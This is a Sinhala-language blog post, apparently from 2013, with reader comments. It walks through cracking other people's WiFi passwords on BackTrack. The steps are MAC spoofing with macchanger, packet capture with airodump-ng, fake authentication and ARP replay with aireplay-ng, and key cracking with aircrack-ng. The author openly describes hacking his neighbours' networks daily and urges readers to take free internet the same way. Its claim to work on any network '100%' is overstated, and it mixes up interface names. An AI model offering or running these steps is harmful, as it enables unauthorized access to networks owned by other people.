WIFI හැක් කරමු විනාඩි 5න් 100% වැඩ..

ඔන්න යාළුවනේ අදත් අපේ කට්ට්ය වෙනුවෙන් මන් අරන් ආවා HACKING යටතේ සුපිරි පොස්ට් එකක්...මේක නං අනිත් පොස්ට් වගේ නෙමෙයි තරමක් සංකීර්ණ කටයුත්තක්...හරි අද අපේ වැඩේ තමයි...WIFI password එකක් හැක් කිරීම.හරිම ලේසි...බය වෙන්න දෙයක් නෑ
ඕනෙම wifi එකක් හැක් කරන්න පුළුවන්...අපේ ගේ අවට ඉන්නවා wifi තියෙන ලෝබ මිනිස්සු ජාතියක් මට උන්ව පෙන්නන්න බෑ ඒක නිසා මන් උන්ගෙන් ගන්න පාලියක් හැටියට හැමදාම wifi හැක් කරනවා...ඕගොල්ලෝ පොඩ්ඩක් බලන්නකෝ මන් හැමදාම facebook එකේ online...හෙ හේ...මේක 100% වැඩ වැරදුනොත් ආයි උත්සහ කරන්න එහෙනං අපි වැඩේට බහිමු...

wifi හැක් කරන්න ඕනෙනං ඉතින් අනිවා පල්ලෙහා ටික ඕන වෙනවා


Linux BackTrack 5r3 DVD
Compatible Wireless Adapter


මන් දන්නවා ඔයාලා ගාව Compatible Wireless Adapter එකක් තියෙන බව BackTrack 5r3 නැති අය මෙතනින් එක බාගන්න..දැන් Virtuual Machine එකෙන් ඔයාගේ පරිගණකයට ස්ථාපනය කරගන්න..මමනං ඕකට යොදා ගත්තේ VmWare කියන software එක..

ඔන්න දැන් තමයි වැඩේට enter වෙන්නේ...
ඔයාලා 
BackTrack 5r3 බාගත්තනේ..හරි දැන් ඔයා Shell Commands එකක් ඕපන් කරගන්න..එකේ ඔය පල්ලෙහා දාලා තියෙන එක දුන්නම දැනට තියෙන wifi network ටික ඔක්කොම පෙන්නනවා airmon-ng


ඔතන තියෙන rao කියන එක ත්මි මම දිගටම පාවිච්චි කරන්නේ...ඔයාලත් දැන් මේ rao එක හොයන්න යන්න එපා..rao කියනේ මන් හැක් කරන්න ඉන්න wifi network එක..ඔයාලා ගන්න ඔයාලගේ network එක 

දැන් පල්ලෙහා තියෙන එක දෙන්න 

airmon-ng stop ra0

අපි මෙතනදී කරන දේ තමයි WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන එක 
දැන් ඔය පල්ලෙහා එක දෙන්න..

ifconfig ra0 down

දැන් පල්ලෙහා එක දෙන්න 

macchanger --mac 00:11:22:33:44:55 ra0

දැන් පල්ලෙහා එක දෙන්න 
airmon-ng start ra0


මෙන්න මෙතැනදී අපි බලන්නේ අලුත් කරපු මැක් ඇඩ්ර්ස් එක හරිද කියල බලන එක..
දැන් පල්ලෙහා එක දෙන්න 
airodump-ng ra0


මේකෙ BSSID Code එක Copy කරල තියාගන්න එක අපිට ඉස්සරහට ඕන වෙනවා...
දැන් පල්ලෙහා එක දෙන්නකෝ..

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0

මෙතනදී අපිට හරියටම හොයා ගන්න පුළුවන් WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න...ඊට පස්සේ අපිට හැකිවෙනවා අපි හැක් කරන්න යන wifi network එකට දැන් ලොග් වෙලා ඉන්න කෙනෙක්ව හොයාගන්න..
දැන් පල්ලෙහා එක දෙන්නකෝ 

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0

දැන් පල්ලෙහා එක දෙන්න 

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0

 දැන් පල්ලෙහා එක දෙන්න 

aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)

ඔන්න දැන් ඉතින් අපි password එක හොයාගත්ත හරිය..දැන් ඕව ගහල කරලා ඉන්ටනෙට් එකම බාගනිල්ලා..මමනං ඕක තමයි කරන්නේ හැමදාම..ආ ඔන්න මම මේක කරන විදිය video එකක් දැම්ම බලනකො පල්ලෙහායින්


මන් හිතනවා මේක අපේ හැම කෙනෙක්ටම වැදගත් වෙයි කියලා එහෙනං ගිහින් එන්නන් සුභ දවසක්...කමෙන්ට් එකක් දාල යන්න අමතක කරන්න එපා හොදේ..
- See more at: http://www.majezticworld.blogspot.com/2013/07/wifi-5-100.html#sthash.6HDuhnok.dpuf

Penulis : nishawi ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel WIFI හැක් කරමු විනාඩි 5න් 100% වැඩ.. ini dipublish oleh nishawi pada hari Tuesday, July 30, 2013. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 6 komentar: di postingan WIFI හැක් කරමු විනාඩි 5න් 100% වැඩ..
 

6 ප්‍රතිචාර:

  1. Godakma Godakma vedagath mama me gena hoya hoya hitiye try karala balannam ok thanks

    ReplyDelete
  2. mage laptop eke wifi tiyenawa .ekanisa BackTrack 5r3 software eka download kirima pramanawathda? ewagema BackTrack 5r3 eka vmware eken install karana akarayath kiyadenna puluwanda?? mul kotasa mata tikak pahadili na. loku udawwak

    ReplyDelete
  3. mul kotasa pahadili madi.man BackTrack 5r3 ekanam download kala eka intall karaganne kohomada??? man kalinuth req kla eka post unada kiyala hoyagan bari una.puluwannam mage email ekta reply karan puluwanda? mewage hacking ekak mata net eke munaghunamai thanks
    thusharanayanajith@gmail.com

    ReplyDelete
  4. මේක නිකන් වෙන උබුන්ටු හරි මොකක් හරි ලිනක්ස් එකකින් කරන්න බැරිද affa..? :/

    ReplyDelete
  5. සුපිරී බන්........ thank මචන්...........

    ReplyDelete
  6. airmon-ng kiyala gehuwata mukuth pennanne nena. interface chipset driver kiyala witharai wetenne .

    ReplyDelete

ඔයලාගේ ඕනම අදහසක් පහළින් දාලා යන්න...